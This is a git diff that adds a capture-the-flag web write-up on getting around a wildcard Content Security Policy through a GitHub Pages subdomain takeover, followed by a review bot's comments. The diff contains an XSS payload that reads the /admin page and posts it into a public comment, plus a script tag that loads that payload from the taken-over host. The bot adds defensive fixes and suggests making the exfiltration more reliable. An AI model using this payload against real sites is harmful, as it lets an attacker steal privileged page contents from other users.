Diffstat (limited to 'punkctf/web_02.md')
-rw-r--r-- | punkctf/web_02.md | 23 |
1 files changed, 23 insertions, 0 deletions
diff --git a/punkctf/web_02.md b/punkctf/web_02.md new file mode 100644 index 0000000..a36bb47 --- /dev/null +++ b/punkctf/web_02.md @@ -0,0 +1,23 @@ + +We can still inject script tags into this comments field, but we can't embed scripts into them, because the CSP (Content Security POlicy) only allows us to load scripts from `*.<random-numbers>.ctf.one.dr.punksecurity.cloud`. + +Running the command they gave for subdomain takeover scanning we find that `docs.<...>` points to GitHub Pages, so we can set up a simple GitHub pages repo and use their subdomain to host whatever we want. `payload.js`: + +``` +fetch('/admin').then(r => r.text()).then(d => { + let data = new URLSearchParams(); + data.append('name', 'admin page'); + data.append('comment', d); + fetch('/new-comment', { + method: 'POST', + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: data, + }); +}) +``` + +Then our comment just loads this script: + +``` +<script src="http://docs.47f325c9-f4c.ctf.one.dr.punksecurity.cloud/payload.js"></script> +``` |
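Review bot: The write-up never says what "the command they gave" for subdomain takeover scanning is, nor which CNAME `docs.<...>` carried, so a reader cannot reproduce the discovery step; name the tool or the DNS lookup that showed the dangling GitHub Pages record, and note the defensive lesson the page already implies: a `script-src` source of the form `*.<random-numbers>.ctf.one.dr.punksecurity.cloud` trusts every subdomain, including unclaimed ones, so exact hostnames (or nonces/hashes) and removal of dangling DNS records are the fix. Two smaller points: "POlicy" is a typo, and both fences are untagged, so label them `javascript` and `html` for rendering. In the payload, `let data` is never reassigned and should be `const`, and the second `fetch` drops its response, so a failed POST would be invisible; appending `.then(r => r.ok)` or a `.catch` would make the write-up's "exfiltrate /admin into a comment" step verifiable rather than fire-and-forget.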